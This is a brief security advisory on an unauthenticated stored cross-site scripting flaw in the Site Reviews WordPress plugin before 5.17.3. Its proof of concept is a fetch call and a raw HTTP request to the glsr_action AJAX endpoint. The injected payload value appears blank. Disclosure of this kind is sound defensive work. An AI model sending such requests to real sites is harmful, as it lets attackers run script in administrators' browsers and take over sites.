Site Reviews < 5.17.3 - Unauthenticated Stored Cross-Site Scripting

The plugin does not sanitise and escape the site-reviews parameter of the glsr_action AJAX action (available to unauthenticated and any authenticated users), allowing them to perform Cross-Site Scripting attacks against logged in admins viewing the Tool dashboard of the plugin

PoC

fetch(“https://example.com/wp-admin/admin-ajax.php?action=glsr_action”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “body”: “site-reviews[0]=”, “method”: “POST”, “credentials”: “include” }) .then(response => response.text()) .then(data => console.log(data)); POST /wp-admin/admin-ajax.php?action=glsr_action HTTP/1.1 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate content-type: application/x-www-form-urlencoded Content-Length: 57 Connection: close site-reviews[0]= The XSS will be triggered when viewing the Tool dashboard of the plugin (/wp-admin/edit.php?post_type=site-review&page;=glsr-tools)